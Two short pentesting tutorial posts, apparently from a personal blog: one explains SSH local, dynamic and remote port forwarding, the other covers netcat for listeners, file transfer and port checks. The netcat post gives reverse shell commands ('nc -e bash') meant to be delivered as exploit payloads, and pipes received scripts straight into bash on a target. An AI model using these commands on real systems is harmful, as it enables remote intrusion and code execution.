SSH Tunnel 2019-11-09

|| SSH Tunnel ||

A very popular service used by almost all system administrator for remote administration as it is secure encrypted connection. For a pentester it is more useful than it seems. Quick Basic: default ssh port : 22 Both windows and linux support ssh ssh provides you remote tty shell Login:

ssh user@168.192.1.100 (or user@hostname.com)

ssh -i key user@hostname.com

That goes very basic of ssh,but ssh has a important feture - tunneling or ssh port forwarding,this is very useful in various condition and that we will discuss here.

Local port forwarding:

Ok imagine a condition when you are in a remote server and you got a service listening on localhost on that server and you might find that you can exploit it(database server normally listens on localhost),but how can you access it? Yes,you can connect to it via a ssh tunnel.

ssh -L 8080:localhost:8080 user@remotehost.net

-L stands for local,and it is called local port forwarding. First 8080 is port of your machine,2nd 8080 is port of remote machine. Now,if you requst localhost:8080 from your browser that request will be send through that ssh tunnel to that remote host and you will be able to connect to that remote service. So,what this tunnel does is whatever request you sent to your localhost it will be forwarded to remote localhost (I hope this line makes sence!) Ok,now make it more complicated(not really,just joking!!).Send a request to a server through a second ssh proxy machine from your client. Your machine is client,second machine to which you are making tunnel is proxy and third machine is server.

ssh -L 8000:server:80 user@proxy.net

then open localhost:8000 in browser and you will be connected to server. The machine to which you are making tunnel is working as proxy and and sending request to server on your behalf,so if your ip is blocked,but the ssh proxy machine can access the server,you can use this. Note that this is also working as a very basic vpn,it is totally encrypted and in your control. But it is not fully functional vpn or proxy as here ip and port of the socket is fixed,to overcome this limitation you can use dynamic tunneling.

Dynamic tunneling:

You can use your ssh server as a fully functional proxy through dynamic tunneling. It uses SOCKS proxy,a proxy protocol, under the ssh tunnel.

ssh -D 8080 user@server.net

This simple command will create a proxy,and configure your browser to send traffic through proxy 8080,then all the traffic of your browser

Remote port forwarding:

Another type of port forwarding is there called remote port forwarding,useful in case when a service is brhind NAT and you want to expose it to public,this type can be used.

ssh -R 4000:server.net:5000 user@server.net

It will forward all the request to server port 5000 to port 4000 of your machine. When your machine is behind a NAT one can send a request to server:4000 and that will be forwarded to your machine. Quick commands:

ssh -L 8000:locahost:9000 user@hostname.net
ssh -L localhost:8000:localhost:9000 user@hostname.net

(same as first one but in first case anyone can use this tunnel on your network,but in second case only you can connect)

ssh -D 9001 user@hostname.net
ssh -R 4000:server.net:5000 user@server.net

Hope you enjoyed; Happy Hacking. more...

Netcat 2019-11-09

|| NetCat: The Swiss Army Knife ||

Netcat is a super useful tool for a pentester. It gives you the ability to use the raw sockets. Ncat is similar tool and that can be used on windows. Both are nearly same regarding functionality. Here I will discuss the most common uses of netcat. It can be used for port scanning,banner grabbing,chatting but most commonly it is used for getting a reverse shell and for file transfer. To set up a Netcat listener on your linux system, type this command in your terminal:

nc -nvlp 1337

n for no dns lookup,v for verbose output,l for listener and p for port. To connect to a port:

nc -np 1337 127.0.0.1

Now,if you want to tranfer a file through netcat,

nc -nvlp 1337 < shell.sh

Just pipe your file to netcat listener,and when a client will connect to it,it will send the file automatically. This is super handy when you are testing a system and there is no curl or wget is installed. To receive the file just connect to the netcat listener but ince connected it will print the content of the file to stdout (your terminal window) and this is not very much useful. Here you can do two thing. One is pipe it to a file,

nc -np 1337 127.0.0.1 > shell.sh

This way output will be saved into a file. Another thing you can do is,if that file is a shell script and you want to run it then you can directly run it by just piping to bash or whatever shell you have.

nc -np 1337 127.0.0.1 | bash

This will execute the script. The last example is used when you want to enumerate target system,just get the enumeration script and run it with bash. Now, another important use is netcat reverse shell. On your target system you can get a reverse shell with netcat. Set up listener on your local machine:

nc -nvlp 1337

Then connect to it from target system:

nc -e bash 127.0.0.1 80

Once executed,you will get a bash shell from target system. You can send this command as payload through a file,through a vulnerable url or by any other exploit. To find a a port is open or not on your target system just try to connect to that port from netcat and you will get a response back if that is open,this is handy for quick banner grabbing and confirming if that port is open or not.

nc 127.0.0.1 443

It will test if https is open or closed on your localhost. Netcat has lot more capabilitiesand you can read those from its man page or with nc –help command.

Quick Commands:

Set listener:

nc -lvnp 1337

Connect to a socket:

nc 127.0.0.1 1337

Send a file:

nc -lvnp 1337 < file.txt

Get a file: nc 127.0.0.1 1337 > file.txt Execute a shell script:

nc 127.0.0.1 1337 | bash

Reverse shell:

nc -e bash 127.0.0.1 1337